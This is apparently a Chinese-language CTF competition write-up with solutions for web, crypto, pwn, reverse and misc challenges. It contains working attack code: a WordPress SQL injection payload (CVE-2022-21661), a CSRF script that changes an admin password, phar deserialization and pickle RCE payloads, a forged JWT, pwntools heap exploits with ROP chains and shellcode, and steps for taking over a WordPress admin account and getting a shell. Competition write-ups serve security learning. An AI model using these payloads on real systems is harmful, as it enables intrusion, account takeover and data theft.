文章目录
Web
crash
垃圾题
python 无R rce
b= b'''(cos
system
S'sleep 10'
o.'''要返回504让后端超时就可以,多个页面请求睡眠就可以返回504
easylogin
CVE-2022-21661
action=aa&query_vars%5Btax_query%5D%5B1%5D%5Binclude_children%5D=1&query_vars%5Btax_query%5D%5B1%5D%5Bterms%5D%5B1%5D=(UPDATEXML(7430,CONCAT(0x2e,0x71626b7671,(SELECT MID((IFNULL(CAST(userid AS NCHAR),0x20)),1,19) FROM moodle.mdl_user_password_resets ORDER BY id),0x7162707171),3592))&query_vars%5Btax_query%5D%5B1%5D%5Bfield%5D=term_taxonomy_id注出8888应用的token利用密码重置功能登陆后台,然后在后台上传插件来rce
flag在etc下
babyweb
随便注册一个账号登录
利用 bugreport 构造 csrf 去修改 admin 密码
var ws = new WebSocket('ws://127.0.0.1:8888/bot')
console.log('ws连接状态:' + ws.readyState)
ws.onopen = function () {
console.log('ws连接状态:' + ws.readyState);
//连接成功则发送一个数据
ws.send('changepw 123456');
}
ws.onmessage = function (data) {
console.log('接收到来自服务器的消息:');
console.log(data);
//完成通信后关闭WebSocket连接
ws.close();
}先用200块买个 hint,读取源码构造负数增加 money
{"product":[{"id":2,"num":-233,"num":0},{"id":1,"num":-233,"num":0}]}然后钱就够了 买 flag 即可
easyweb
showfile 可以任意文件读 有过滤 先读取源码
随便看看后发现上传 phar 去触发反序列化
<?php
class Upload {
public $file;
public $filesize;
public $date;
public $tmp;
}
class GuestShow{
public $file;
public $contents;
}
class AdminShow{
public $source;
public $str;
public $filter;
}
$a = new AdminShow();
$a->source="http://10.10.10.10/";
$b = serialize($a);
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'."<?php_HALT_COMPLILER();?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('phar.phar','guest.jpg');
?>简简单单构造 poc 去打内网 读取过 /etc/hosts
c 段找到10.10.10.10 可以看到源码
利用 file 协议读取 flag
Crypto
myJWT
java的签名cve,用0去绕过整个签名。审计代码,token分为三段,第一段不用动,第二段的false改成true,然后exp的时间改大一点,base64一下,第三段直接传0,也就是AAAAAAAA就可以了
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxMDAwMDAwMDAwMDAwMDB9.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==factor
和d3ctf那个factor一样的paper
from Crypto.Util.number import *
import gmpy2
n11=801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637
n12=635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371
e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865
e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881
n2=209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209
e2=65537
n3=539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
e3=8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145
c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579
c12=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665
c2=18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653
c3=113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763
# problem1---paper section5
cf = continued_fraction(n11/n12)
for i in range(2,len(cf)):
q11 = cf.numerator(i)
if n11%q11==0:
q12 = cf.denominator(i)
break
p11 = gmpy2.iroot(n11//q11,2)[0]
p12 = gmpy2.iroot(n12//q12,2)[0]
d11 = inverse(e11,(p11**2-p11)*(q11-1))
d12 = inverse(e12,(p12**2-p12)*(q12-1))
m1 = int(pow(c11, d11, n11))
m2 = int(pow(c12, d12, n12))
# problem2---paper section4
PR.=PolynomialRing(Zmod(n2))
f = (m1*m2*x-(m1-m2)).monic()
x = f.small_roots(X=2^750,beta=0.75,epsilon=0.1)
g = GCD(int(m1*m2*x[0]-(m1-m2)),n2)
p2 = gmpy2.iroot(g,6)[0]
q2 = n2//(p2**7)
print(p2, q2)
phi2 = (p2**7-p2**6)*(q2-1)
d2 = inverse(e2, phi2)
b = int(pow(c2, d2, n2))
# problem3---paper section3
PR. = PolynomialRing(Zmod(n3))
f = (x*(e3//b)-1).monic()
x=f.small_roots(X=2^750,beta=0.75,epsilon=0.1)
print(x)
p3 = GCD(int(x[0]*(e3//b)-1),n3)
p3 = gmpy2.iroot(p3,6)[0]
q3 = n3//p3**7
print(p3, q3)
phi3 = p3**6*(p3-1)*(q3-1)
d3 = inverse(e3, phi3)
m3 = int(pow(c3,d3,n3))
print(long_to_bytes(m3))Pwn
house of cat
from pwn import*
r=remote("182.92.222.142",25394)
#r=process('./house_of_cat')
context.log_level='debug'
libc=ELF("./libc.so.6")
r.recvline()
r.send("LOGIN | r00t QWBQWXF admin")
def new(idx,size,content):
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("1")
r.recvuntil(":\n")
r.sendline(str(idx))
r.recvuntil(":\n")
r.sendline(str(size))
r.recvuntil(":\n")
r.send(content)
def delete(idx):
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("2")
r.recvuntil(":\n")
r.sendline(str(idx))
def show(idx):
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("3")
r.recvuntil(":\n")
r.sendline(str(idx))
def edit(idx,content):
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("4")
r.recvuntil(":\n")
r.sendline(str(idx))
r.recvuntil(":\n")
r.send(content)
new(0,0x418,"\n")
new(1,0x428,"\n")
new(2,0x418,"\n")
delete(1)
new(15,0x468,"flag")
show(1)
r.recvline()
libc_base=u64(r.recv(8))-0x21a0d0
success("libc_base: "+hex(libc_base))
stderr=libc_base+0x21a860
tls=libc_base-0x2890
top_chunk=libc_base+0x219ce0
IO_wstrn_jumps=libc_base+0x215dc0
IO_str_jumps=libc_base+0x2166c0
IO_cookie_read=libc_base+0x215be0
_IO_wfile_jumps=libc_base+0x2160c0
setcontext=libc_base+libc.sym["setcontext"]+61
#0x000000000011388f : mov rdx, qword ptr [rax + 0xb0] ; call qword ptr [rax + 0x88]
gadget=libc_base+0x11388f
pop_rdi=libc_base+0x2a3e5
pop_rsi=libc_base+0x2be51
pop_rdx=libc_base+0x90529
pop_rcx=libc_base+0x8c6bb
pop_r8=libc_base+0x165b76
syscall=libc_base+0x91396
pop_rax=libc_base+0x45eb0
r.recv(8)
heap=u64(r.recv(8))-0x6b0
success("heap: "+hex(heap))
fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(heap+0x570)
fake_IO_struct=fake_IO_struct.ljust(0x64,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x78,"\x00")
fake_IO_struct+=p64(heap)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0x1470)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps-0x20)
fake_IO_struct=fake_IO_struct.ljust(0x158,"\x00")
fake_IO_struct+=p64(gadget)
fake_IO_struct=fake_IO_struct.ljust(0x178,"\x00")
fake_IO_struct+=p64(setcontext)
fake_IO_struct=fake_IO_struct.ljust(0x1a0,"\x00")
fake_IO_struct+=p64(heap+0x1570)
fake_IO_struct=fake_IO_struct.ljust(0x1d0,"\x00")
fake_IO_struct+=p64(heap+0x1470)
fake_IO_struct=fake_IO_struct.ljust(0x290,"\x00")
fake_IO_struct+=p64(heap+0x1670)+p64(pop_rdi)
fake_IO_struct=fake_IO_struct.ljust(0x2f0,"\x00")
fake_IO_struct+=p64(heap+0xf10)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(0x2)+p64(syscall)
fake_IO_struct+=p64(pop_r8)+p64(3)+p64(pop_rdi)+p64(0xA0000)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx)+p64(1)+p64(0)+p64(pop_rcx)+p64(1)+p64(libc_base+libc.sym["mmap"])
fake_IO_struct+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(0xA0000)+p64(pop_rdx)+p64(0x30)+p64(0)+p64(libc_base+libc.sym["write"])
new(10,0x418,"\n")
new(3,0x418,fake_IO_struct)
new(4,0x418,"\n")
new(5,0x448,"\n")
new(6,0x418,"\n")
new(7,0x438,"\n")
new(8,0x418,"\n")
delete(1)
new(11,0x468,"\n")
delete(3)
edit(1,p64(libc_base+0x21a0d0)+p64(libc_base+0x21a0d0)+p64(heap+0x6c0)+p64(stderr-0x20))
new(14,0x468,"\n")
delete(5)
new(13,0x468,"\n")
delete(7)
edit(5,p64(libc_base+0x21a0e0)+p64(libc_base+0x21a0e0)+p64(heap+0x1740)+p64(top_chunk-0x20))
#gdb.attach(r,"b _IO_wdoallocbuf")
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("1")
r.recvuntil(":\n")
r.sendline(str(12))
r.recvuntil(":\n")
r.sendline(str(0x468))
r.interactive()qwarmup
from pwn import*
#r=remote("127.0.0.1",9999)
#r=remote("121.40.213.105",12001)
r=process('./qwarmup')
context.log_level='debug'
libc=ELF("./libc-2.35.so")
def write(offset,content):
for i in range(len(content)):
r.send(p64(offset+i))
r.send(content[i])
r.recvuntil("Success!")
def rol(num,shift):
for i in range(shift):
num=(num<<0x1)&0xFFFFFFFFFFFFFFFF+(num&0x8000000000000000)
return num
r.send(p32(0xF0000))
write(0x3592d0,"\x70")
write(0x30e770,p32(0xfbad1800))
write(0x30e770+0x20+0x8,"\xFF")
write(0x359108+0x22,"_IO_flush_all")
r.send(p64(0x359338))
gdb.attach(r, "b _IO_cookie_read")
r.send("\xb8")
r.recv(5)
libc_base=u64(r.recv(8))-0x21ba70
success("libc_base: "+hex(libc_base))
setcontext=libc_base+libc.sym["setcontext"]
pop_rdi=libc_base+0x2a3e5
pop_rsi=libc_base+0x2be51
pop_rdx=libc_base+0x90529
pop_rcx=libc_base+0x8c6bb
pop_r8=libc_base+0x165b76
syscall=libc_base+0x91396
pop_rax=libc_base+0x45eb0
#0x00000000001675b0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
gadget=libc_base+0x1675b0
base=libc_base-0xf3ff0
write(0x359338,"\x78")
write(0x30e770,p64(base))
write(0x30e690+0xd8,p64(libc_base+0x215b80+0x58))
write(0x30e690+0x28,"\x01")
write(0x30e690+0xe8,p64(rol(gadget,0x11)))
write(0xf1760,p64(0))
payload="flag"+p32(0)+p64(base)+p64(0)*0x2+p64(setcontext+61)
payload=payload.ljust(0xa0,"\x00")
payload+=p64(base+0x100)+p64(pop_rdi)
payload=payload.ljust(0x100,"\x00")
payload+=p64(base)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(base)+p64(pop_rdx)+p64(0x50)+p64(0)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])
write(0,payload)
r.send(p64(0x359338))
r.send("\xb8")
r.interactive()Re
Gamemaster
dnspy 反编译,对gamemessage里的数据先异或 34 再 AES解密一下,key在dnspy中能找到。
源程序里将 gamemessage 里的数据解密后反序列化为了一个对象,这里我门解密出来,找打MZ开始的PE文件头,将数据提取出来写入新文件中就得到了一个net的文件,但是无法执行,使用dnspy反编译能看到代码,传入的3个参数不清楚,但是这3个参数经过线性反馈移位寄存器计算以后的值我们是知道的。用z3解一下方程,解出来x y 正确 z 不对,选择爆破z ,得到正确的z 以后直接异或就是flag
from z3 import *
x = BitVec('x', 32)
y = BitVec('y', 32)
z = BitVec('z', 32)
KeyStream = [0] * 40
num = -1
for i in range(0, 320):
x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1) | x << 1)
y = (((y >> 30 ^ y >> 27) & 1) | y << 1)
z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1) | z << 1)
if i % 8 == 0:
num += 1
KeyStream[num] = ((KeyStream[num] << 1) | ((((z >> 32 & 1 & (x >> 30 & 1)) ^ (((z >> 32 & 1) ^ 1) & (y >> 31 & 1))))))
s = Solver()
for i in range(0, 40):
s.add(KeyStream[i] == first[i])
if s.check() == sat:
res = s.model()
print(res)
else:
print("NO")
y = 868387187
x = 156324965
z = 3131229747
arr = [0] * 3
arr[0],arr[1],arr[2] = x,y,z
key = []
for i in range(0, 3):
for j in range(0, 4):
key.append((arr[i] >> (8 * j)) & 0xff)
flag = b''
for i in range(0, len(enc)):
flag += (enc[i] ^ key[i % len(key)]).to_bytes(1,'little')
print(flag)easyapk
这里的 v144 动态调试,动态调试发现是一个固定值,正好是0x9e3779b9 ,tea加密算法的特征,下方就是tea加密算法
key 赋值的地方
key计算脚本
#include
#include
#include
#include
#include
int main()
{
// char key[] = {"hello_tea_hello!"};
uint32_t key[4] = {858927408, 926299444, 1650538808, 1717920867};
uint32_t v15 = time(0);
key[0] = ((v15 & 0x20000000) - (v15 & 0xD0000000) + 2 * (v15 & 0x50000000) + 705251522) ^ 0xB93B79F2;
uint32_t v16 = time(0);
key[1] = ((v16 & 0x10000000) - (v16 & 0xE0000000) + 2 * (v16 & 0x60000000) + 268614163) ^ 0x47348F27;
uint32_t v17 = time(0);
key[2] = ((v17 & 0x50000000) - (v17 & 0xA0000000) + 2 * (v17 & 0x20000000) + 1598838216) ^ 0xDD2D6CF0;
uint32_t v18 = time(0);
key[3] = (((v18 & 0x40000000) - (v18 & 0xB0000000) + 2 * (v18 & 0x30000000) + 1085702636) ^ 0x30240060 | 0x99A9B9D)
+ 2 * (((v18 & 0x40000000) - (v18 & 0xB0000000) + 2 * (v18 & 0x30000000) + 1085702636) ^ 0x46D3E58F);
uint32_t v148 = time(0);
uint32_t detal = (((v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13) ^ 0xF4170810 | 0x1C88647) + 2 * (((v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13) ^ 0xBA075AA);
printf("%u %u %u %u %u",key[0],key[1],key[2],key[3],detal);
return 0;
}密文enc在check函数里用memcmp比较,导出套一个tea脚本就行
#include
#include
#include
#include
void encrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
uint32_t delta=0xdeadbeef; /* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i < 48; i++) { /* basic cycle start */
sum += delta;
v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
} /* end cycle */
v[0]=v0; v[1]=v1;
}
void decrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */
uint32_t delta=0x9e3779b9; /* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i<32; i++) { /* basic cycle start */
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
} /* end cycle */
v[0]=v0; v[1]=v1;
}
uint32_t enc[] = {1570024068, 351937696, 727056912, 3063668041, 2867849940,1267528902, 159365321, 3052163538,0};
int main()
{
// char key[] = {"hello_tea_hello!"};
uint32_t key[4] = {858927408, 926299444, 1650538808, 1717920867};
for(int i = 0; i < 8; i += 2)
{
decrypt(enc + i,(uint32_t *)key);
}
uint8_t *p = (uint8_t *)key;
for (int i = 0 ;i < 32; ++i)
{
}
printf("%s",enc);
return 0;
}得到的flag直接交不对,看了字符的形式应该是位移了一下放到在线网站解密
强网先锋
asr
离谱的题目,n开平方放yafu里硬跑,跑出来的结果还要在日志里面翻,跑了两次,跑出来两个素数,然后剩下的部分再用sage分解或者yafu都可以。
e和phi不互素,把不互素的两个质数去掉算就可以了。
from Crypto.Util.number import *
n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
e = 3
c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
p1 = 260594583349478633632570848336184053653
p2 = 223213222467584072959434495118689164399
p3 = 218566259296037866647273372633238739089
p4 = 225933944608558304529179430753170813347
phi = (p1**2-p1)*(p2**2-p2)*(p3**2-p3)*(p4**2-p4)
assert p1**2*p2**2*p3**2*p4**2 == n
nn = pow(p1*p2, 2)
c = c%nn
dd = inverse(e, (p1**2-p1)*(p2**2-p2))
m = pow(c, dd, nn)
print(long_to_bytes(m))polydiv
from pwn import*
from sage.all import*
io=remote('123.56.86.227', 29644)
#验证码
def proof_of_work():
rev = io.recvuntil(b"sha256(XXXX+")
suffix = io.recv(16).decode()
print(suffix)
rev = io.recvuntil(b" == ")
tar = io.recv(64).decode()
def f(x):
hashresult = hashlib.sha256(x.encode()+suffix.encode()).hexdigest()
return hashresult == tar
prefix = util.iters.mbruteforce(f, string.digits + string.ascii_letters, 4, 'upto')
io.recvuntil(b'XXXX:')
io.sendline(prefix.encode())
proof_of_work()
R = PolynomialRing(GF(2),'x')
x = R.gen()
for i in range(40):
io.recvuntil(b'r(x) = ')
r = io.recvline(keepends = False).decode()
io.recvuntil(b'a(x) = ')
a = io.recvline(keepends = False).decode()
io.recvuntil(b'c(x) = ')
c = io.recvline(keepends = False).decode()
r = r.replace('^','**')
a = a.replace('^','**')
c = c.replace('^','**')
r = R(r)
a = R(a)
c = R(c)
b = (r-c)/a
b = str(b).encode()
print(b)
io.sendline(b)
io.interactive()devnull
from pwn import*
#r=remote("123.56.86.227",18680)
r=process('./devnull')
context(os="linux",arch="amd64",log_level='debug')
r.recvuntil("please input your filename\n")
r.send("a"*0x20)
stack=0x3feA00
shell=asm("""
xor rdi,rdi
push 0x3fe000
pop rsi
pushfq
pop rdx
xor rax,rax
syscall
jmp rsi
""")
r.recvuntil("Please write the data you want to discard\n")
gdb.attach(r)
r.send("a"*0x14+p64(stack)+p64(stack)+p64(0x40138D))
r.recvline("please input your new data\n")
payload=p64(stack+0x28)+p64(0x401350)+p64(stack&0xFFF000)+p64(0x4012d0)+p64(0)+p64(0)+p64(0x4012d0)+p64(0)+p64(stack+0x48)+shell
r.send(payload.ljust(0x60,"\x00"))
shell="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
r.send(shell)
r.interactive()rcefile
结合spl_autoload_register()通过反序列化去rce。上传inc文件
<?php
system('ls');
?>通过 0:32:"文件名":0:{} 直接触发inc中代码完成rce。
WP-UM
先随便注册一个账号
利用 upload 上传获取 pf_nonce
利用公开的 cve 遍历文件 password 可以登录
登录之后利用主题编辑器修改 php 文件 getshell
利用 find 命令筛选时间 找到 flag 位置
Misc
签到
直接交
问卷
直接交
最新评论